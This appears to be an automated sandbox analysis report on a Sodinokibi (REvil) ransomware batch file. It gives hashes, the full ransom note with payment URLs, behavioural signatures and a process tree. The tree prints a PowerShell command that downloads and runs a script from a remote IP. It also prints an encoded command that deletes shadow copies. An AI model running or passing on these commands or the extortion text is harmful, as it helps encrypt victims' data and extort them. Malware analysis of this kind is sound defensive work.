Analysis

  • max time kernel
    126s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    15-08-2020 18:10

General

  • Target

    7cd0bfdb268bef7da1671e95b6f5aa33.bat

  • Size

    216B

  • MD5

    a5ff6055fd55ba2b81de2d9b7100ec8a

  • SHA1

    b8df51a999fc532ba49b2f5769ed7b850ca94f75

  • SHA256

    60f07d4e5bfcf8fc08bf003d47aa6915f9c2dd834aa0b75985106206216a460c

  • SHA512

    9596d6d408462e5eea678ffa474b6fca135fe71ad024ce6e080ef350ec370c7820585e805e58f44e11cd1fb362badc39878794e505343892c6eb4cbbccbca20d

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33

Extracted

Path

C:\860d66w-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 860d66w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3FB5F5D0526F17E3 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: HwGblpMtMGZjV5TVt/lt/+KxJ1GQTEBd7zI/TmttiMQbzwOtNlrt4Q6vfsmxXcMO r3vpYgqxgLHw8pKufuAP92ZxEVhpTWxlCVsGX/Xl7PG4EWaYKw/esEKN//Wnb2ZL JZW/JcMkSUDBMi5LqkovhjFf5Fjt88ePnlEKtX0SVEX9ahwyxn0SpjIAZVTlI1fO llC7rtbP7AL/swUGVnaU1cTTc+guorcgcIhIywlbRVTrZr+JujeJA/vxsNDHHd0W ajWHHjtF4KX7Fq1SEadCE3bwbAvuUi72l6fJMXVVf/4v/WoFSeZZtRcFE5vQHUdM P36TwXLQaXItBls/U+i6krXjtlN0Kuyw719MZm2r0VvhEmfB7cxMSdTN0kvmMFpX 75XWvJ0OlHWRQTLlCiGW+rICyO80F+jO0lALBWhGM+nC9oCdXmqYIlfgjMdcpVd+ /fJ+dCSXhUiEaSNyMzJKaPdJSpzTRRpyNKInQbbPfnbAa9gBsByCFUAGoOsODM8/ GNSJotBri8oIydNRyioV8VaswXGJnCQ6VaMpHin6OYWdqARKo86dgVUV4dSBXopz EWGKbTv3hKWoT9N7+0zFJlGdkhQNBBUMm7rt+3LJ8QUwj+3osH1e8xAtg+2vCXLw gYY1sFCGxaBVRdqnSaw1hQysxCNZF63UYl7/J7RPkgn/oNBFNHYN7mAdZly+9xag 2gq3szPCGczJeqNV3h5q+CQ77qAyvImWtCvSDiCX534HD6QDSj+bTzyNZ1sO6Koy +W3mzi75m4nfuGOaDYvGNqD/tRk6BumZSJpb1GN9OLR0Nwv4kfd+zK55I989J9V6 Q+2b8pXTOOZ9WgUl+bksKqKGUJ4Tkaaqp+8c3QI6N1f3ussvL/uTv8+SgZHSOG0k cbH5iKYfYXq91P1mutMDJAzgHbQZSBDouKnydVfnrz4USnAd17EbTmwjiPcVUhvp 02ooofZycjzNxGc8WXCdIqeghjl6tfgi5nA3/dx1d+GzM2lCVUOXHYgXMJBvjrPs vnibxIBqKsVS40+LkJLm1j0YG7sbOScng2DR3UAcGGnrP5nNma6DaMClYRkIJCeH fFS4V7WF8Ww0KATctruBk6ezAneBs/Qb1+TmqVkYIVkWiRwE57DgbAXElWh7Il1u CgugKW9P+PbEoFCPg+rjMBVVDCpKlM3OJ01CfEKySvaqWUOfGk1575jKN/3Ql/g9 fd9NcAdeLK9qtFxDCtVrdJ3tvH1KA+NOaHbVrvD5Y5z96IbL/EHobDWgEvXWSsaO NZcqB2+AGC+GBbjZIhhRaBvM ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3

http://decryptor.cc/3FB5F5D0526F17E3

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7cd0bfdb268bef7da1671e95b6f5aa33.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7cd0bfdb268bef7da1671e95b6f5aa33');Invoke-CROBJXDEH;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3228
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:736
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3028

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/736-13-0x0000000000000000-mapping.dmp

  • memory/736-27-0x0000000009F40000-0x0000000009F41000-memory.dmp

    Filesize

    4KB

  • memory/736-26-0x00000000096B0000-0x00000000096B1000-memory.dmp

    Filesize

    4KB

  • memory/736-24-0x0000000009980000-0x0000000009981000-memory.dmp

    Filesize

    4KB

  • memory/736-14-0x0000000073B60000-0x000000007424E000-memory.dmp

    Filesize

    6.9MB

  • memory/3228-8-0x0000000007690000-0x0000000007691000-memory.dmp

    Filesize

    4KB

  • memory/3228-6-0x0000000007560000-0x0000000007561000-memory.dmp

    Filesize

    4KB

  • memory/3228-7-0x00000000077B0000-0x00000000077B1000-memory.dmp

    Filesize

    4KB

  • memory/3228-0-0x0000000000000000-mapping.dmp

  • memory/3228-9-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

    Filesize

    4KB

  • memory/3228-10-0x0000000007E60000-0x0000000007E61000-memory.dmp

    Filesize

    4KB

  • memory/3228-11-0x0000000009620000-0x0000000009621000-memory.dmp

    Filesize

    4KB

  • memory/3228-12-0x0000000008BA0000-0x0000000008BA1000-memory.dmp

    Filesize

    4KB

  • memory/3228-5-0x00000000074F0000-0x00000000074F1000-memory.dmp

    Filesize

    4KB

  • memory/3228-4-0x0000000006D10000-0x0000000006D11000-memory.dmp

    Filesize

    4KB

  • memory/3228-3-0x0000000006EC0000-0x0000000006EC1000-memory.dmp

    Filesize

    4KB

  • memory/3228-2-0x0000000006700000-0x0000000006701000-memory.dmp

    Filesize

    4KB

  • memory/3228-1-0x0000000073B60000-0x000000007424E000-memory.dmp

    Filesize

    6.9MB